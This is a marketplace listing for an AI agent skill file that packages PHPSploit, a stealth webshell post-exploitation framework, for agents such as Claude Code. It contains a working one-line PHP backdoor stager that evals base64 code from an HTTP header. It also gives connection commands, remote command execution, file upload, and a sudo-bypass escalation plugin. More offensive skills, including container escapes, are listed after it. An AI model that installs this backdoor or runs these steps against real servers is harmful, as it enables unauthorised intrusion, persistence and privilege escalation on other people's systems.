offensive-tools/c2/phpsploit/SKILL.md
Stealth post-exploitation framework operating via HTTP headers inside a webshell. Use when you have a PHP webshell on target and need an interactive shell, file ops, and plugin-based post-exploitation over HTTP.
npx skillsauth add aeondave/malskill phpsploitInstall this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.
Stealth PHP webshell framework — full interactive session tunneled in HTTP headers.
pip install phpsploit
phpsploit
# Set target and connect
set TARGET http://target.com/shell.php
set PASSKEY MySecret
exploit
| Command | Purpose |
|---------|---------|
| set TARGET <url> | Webshell URL |
| set PASSKEY <key> | Obfuscation passkey |
| exploit | Connect to shell |
| ls, cd, cat | File system ops |
| upload <local> <remote> | Upload file |
| download <remote> | Download file |
| run <cmd> | Execute OS command |
| load <plugin> | Load plugin |
Minimal PHP stager (upload to target):
<?php @eval(base64_decode($_SERVER['HTTP_X_PAYLOAD']));
Post-exploitation after file upload vuln:
set TARGET http://target.com/uploads/shell.php
exploit
run whoami
Escalate with plugin:
load post/exploit/sudo-bypass
run
| File | When to load |
|------|--------------|
| references/ | Webshell variants and plugin list |
development
White-box auditing methodology for AI-generated ('vibe-coded') applications. Focuses on modern stack misconfigurations (Supabase, Next.js, Vercel).
development
Hybrid AI/Deterministic SAST methodology for discovering zero-day vulnerabilities in source code. Orchestrates structural search with AI-driven data flow and sink validation.
development
Auth assessment: hardware/embedded methodology; UART/JTAG/SWD/SPI/I2C, firmware extraction, boot/debug paths, embedded OS evidence.
devops
Container methodology: Identifying containerization limits, Docker/K8s misconfigurations, and executing escapes to the host node.